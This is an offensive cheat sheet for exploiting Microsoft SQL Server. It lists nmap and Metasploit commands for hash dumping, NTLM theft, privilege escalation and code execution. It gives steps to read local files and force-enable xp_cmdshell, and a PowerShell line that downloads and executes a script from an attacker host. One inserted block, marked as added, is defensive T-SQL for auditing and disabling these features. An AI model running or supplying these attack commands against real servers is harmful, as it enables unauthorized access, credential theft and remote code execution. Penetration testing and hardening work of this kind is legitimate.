MS-SQL - port 1433

Exploitation techniques for Microsoft SQL Server services

Scan

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

Metasploit modules

Note: these modules require credentials.

#NTLM theft
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder

#Info gathering
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec
msf> use exploit/windows/mssql/mssql_payload

#Add a new administrator from a meterpreter session
msf> use windows/manage/mssql_local_auth_bypass

Connection

From a Linux machine

sqsh -S <IP> -U <Username> -P <Password> -D <Database>

From a Windows machine

Download SSMS (SQL Server Management Studio)

https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms

More convenient (graphical interface)

Read local files

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

Code execution

To execute operating-system commands through MSSQL, xp_cmdshell must be enabled. If it is not, it can be enabled by force, provided the login has sufficient privileges (sysadmin, or ALTER SETTINGS at server level).

Check

> xp_cmdshell 'whoami';
> go

Enable xp_cmdshell

> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go

> xp_cmdshell 'whoami';
> go

Force enabling (when the option is hidden behind "show advanced options")

> EXEC SP_CONFIGURE 'show advanced options', 1;
> reconfigure;
> go

> EXEC SP_CONFIGURE 'xp_cmdshell' , 1;
> reconfigure;
> go

> xp_cmdshell 'whoami';
> go
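As an added example, not taken from the original page: the T-SQL a DBA can run to audit the settings and grants the enable sequence above depends on, and to switch xp_cmdshell back off. It assumes a sysadmin connection and uses only SQL Server's built-in catalog views.

```sql
-- Added example, not part of the original page: audit the server-level settings
-- and grants the enable sequence above depends on, then switch xp_cmdshell back off.
-- Assumes a connection with sysadmin rights (needed for the sp_configure calls).

-- 1. Options flipped by sp_configure; value_in_use = 1 means currently enabled.
--    Advanced options are listed here even when 'show advanced options' is 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options',
               'Ad Hoc Distributed Queries', 'Ole Automation Procedures');

-- 2. Logins able to run the enable sequence: members of sysadmin.
SELECT m.name AS login_name, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 3. Logins granted the permission OPENROWSET(BULK ...) needs, as used in the
--    "Read local files" step above (sysadmin members hold it implicitly).
SELECT p.name AS login_name, sp.permission_name, sp.state_desc
FROM sys.server_permissions AS sp
JOIN sys.server_principals AS p ON p.principal_id = sp.grantee_principal_id
WHERE sp.permission_name = 'ADMINISTER BULK OPERATIONS';

-- 4. The built-in sa login (principal_id 1) is what the nmap
--    ms-sql-empty-password script probes; it should be disabled or renamed.
SELECT name, is_disabled, is_policy_checked
FROM sys.sql_logins
WHERE principal_id = 1;

-- 5. Reverse the "force enabling" sequence if xp_cmdshell was left on,
--    and hide advanced options again afterwards.
IF EXISTS (SELECT 1 FROM sys.configurations
           WHERE name = 'xp_cmdshell' AND value_in_use = 1)
BEGIN
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
    EXEC sp_configure 'show advanced options', 0;
    RECONFIGURE;
END;
```

Re-run step 1 after the block: on a hardened instance every listed option reports value_in_use = 0, and the sysadmin list in step 2 should contain only accounts you recognise.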

File download

> xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://<your ip>:<port>/script.ps1')";
> go

With CrackMapExec

#Download
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --get-file Windows/file/path/file.txt local/file/path

#Upload
$ crackmapexec mssql <target IP> -u 'username' -p 'password' --put-file local/file/path Windows/file/path/file.txt
